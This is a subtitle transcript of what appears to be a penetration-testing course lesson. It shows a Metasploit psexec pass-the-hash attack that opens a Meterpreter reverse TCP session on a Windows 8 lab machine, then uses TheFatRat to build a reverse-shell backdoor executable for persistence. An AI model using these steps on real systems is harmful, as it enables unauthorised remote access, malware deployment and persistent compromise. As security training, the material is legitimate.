1
00:00:00,490 --> 00:00:06,310
So let's try another method for persistence, which is not deprecated yet.

2
00:00:07,850 --> 00:00:14,450
So if you can recall, when we run the Meterpreter's persistence module, it says that the Meterpreter scripts

3
00:00:14,450 --> 00:00:21,860
are deprecated and suggests to us to try the post/windows/manage/persistence_exe module.

4
00:00:23,310 --> 00:00:30,000
And when we look at the options of the persistence_exe module, we see that we need to have two things.

5
00:00:30,000 --> 00:00:32,790
First, we need a session to run the session on.

6
00:00:33,190 --> 00:00:37,890
Second, we need to have an executable to use as the backdoor binary.

7
00:00:38,490 --> 00:00:44,250
And that means it's our responsibility to find or create a backdoor to use with this module.

8
00:00:45,420 --> 00:00:47,340
So let's create a session first.

9
00:00:47,670 --> 00:00:52,320
This is the victim machine, Windows 8, with the IP address two two three.

10
00:00:53,480 --> 00:00:57,770
Now, I want to be sure that Windows Defender is up and running.

11
00:00:58,610 --> 00:01:03,080
So typing defender in the Start menu, here is the Windows Defender.

12
00:01:03,080 --> 00:01:07,820
And yup, it's running and the real-time protection is on.

13
00:01:08,960 --> 00:01:14,240
So go back to Kali, open a terminal window and run msfconsole.

14
00:01:20,370 --> 00:01:21,570
And here I'll use again

15
00:01:21,830 --> 00:01:27,810
the PsExec module to create a Meterpreter session on the Windows 8 victim system.

16
00:01:28,900 --> 00:01:32,980
So use exploit/windows/smb/psexec.

17
00:01:33,870 --> 00:01:38,490
Set the payload to windows/meterpreter/reverse_tcp.

18
00:01:39,540 --> 00:01:45,990
Now is the time to set the options: Kali as LHOST, Windows 8 as RHOST.

19
00:01:47,610 --> 00:01:48,660
User is admin.

20
00:01:49,700 --> 00:01:53,120
The password hash was in the file on the desktop.

21
00:01:59,110 --> 00:02:01,690
Now we are ready to run the exploit.

22
00:02:03,080 --> 00:02:07,850
Yep, look at that, we have a Meterpreter session on the Windows 8 system, two two three.

23
00:02:09,440 --> 00:02:12,800
So we opened the session and now we need a backdoor.

24
00:02:14,900 --> 00:02:20,870
I'm going to use TheFatRat tool to create the malware that sounds like it worked on it.

25
00:02:22,200 --> 00:02:28,920
Well, you're right, TheFatRat is a powerful and easy-to-use exploitation tool that can help you

26
00:02:28,920 --> 00:02:34,770
to generate backdoors and post-exploitation attacks like browser attack, DLL files.

27
00:02:35,460 --> 00:02:41,820
This tool compiles malware with popular payloads, and then the compiled malware can be executed on

28
00:02:41,820 --> 00:02:44,550
Windows, Linux, Mac OS X and Android.

29
00:02:46,450 --> 00:02:52,420
Now, since it's not the subject of the course, I'm not going to go in too deep with TheFatRat.

30
00:02:53,260 --> 00:02:55,870
I'll just quickly use it just to give you an idea.

31
00:02:57,580 --> 00:03:01,810
To have detailed information about creating undetectable malicious software,

32
00:03:02,470 --> 00:03:02,980
please,

33
00:03:03,010 --> 00:03:07,630
I'll refer you to the social engineering and malware for hacking course.

34
00:03:09,600 --> 00:03:14,700
So when we run TheFatRat, it first checks if dependent applications are ready.

35
00:03:21,720 --> 00:03:26,760
Now, a warning about not to upload the created malware to VirusTotal.

36
00:03:28,200 --> 00:03:30,300
Then it starts PostgreSQL.

37
00:03:30,780 --> 00:03:34,140
And finally, we're on the main menu of TheFatRat app.

38
00:03:35,460 --> 00:03:39,450
Now, type six, to use the sixth option to create a backdoor.

39
00:03:39,960 --> 00:03:44,160
Now we are in the PwnWinds menu; choose the fourth option here.

40
00:03:46,070 --> 00:03:47,720
Now it is time to set the options.

41
00:03:48,320 --> 00:03:52,760
LHOST is Kali; I'll choose four three two one for the LPORT.

42
00:03:53,180 --> 00:03:55,010
Now that doesn't have a special meaning.

43
00:03:55,010 --> 00:03:58,160
You can choose any port which is not in use at the moment.

44
00:03:59,120 --> 00:04:02,000
Choose a base name for the file that will be produced.

45
00:04:02,090 --> 00:04:04,640
I'll choose my pretty backdoor.

46
00:04:06,820 --> 00:04:13,080
Now it asks for the payload, and I choose three, Meterpreter reverse TCP.

47
00:04:15,220 --> 00:04:18,670
I start to generate the backdoor and a few seconds later

48
00:04:18,940 --> 00:04:21,610
the backdoor file is saved to the output folder.

49
00:04:23,820 --> 00:04:29,790
Well, I'll open another terminal screen to look at the output folder and go to the output folder under

50
00:04:29,790 --> 00:04:32,970
TheFatRat using the cd command, of course.

51
00:04:34,990 --> 00:04:39,880
And there it is, my pretty backdoor is right here where I wanted it to be.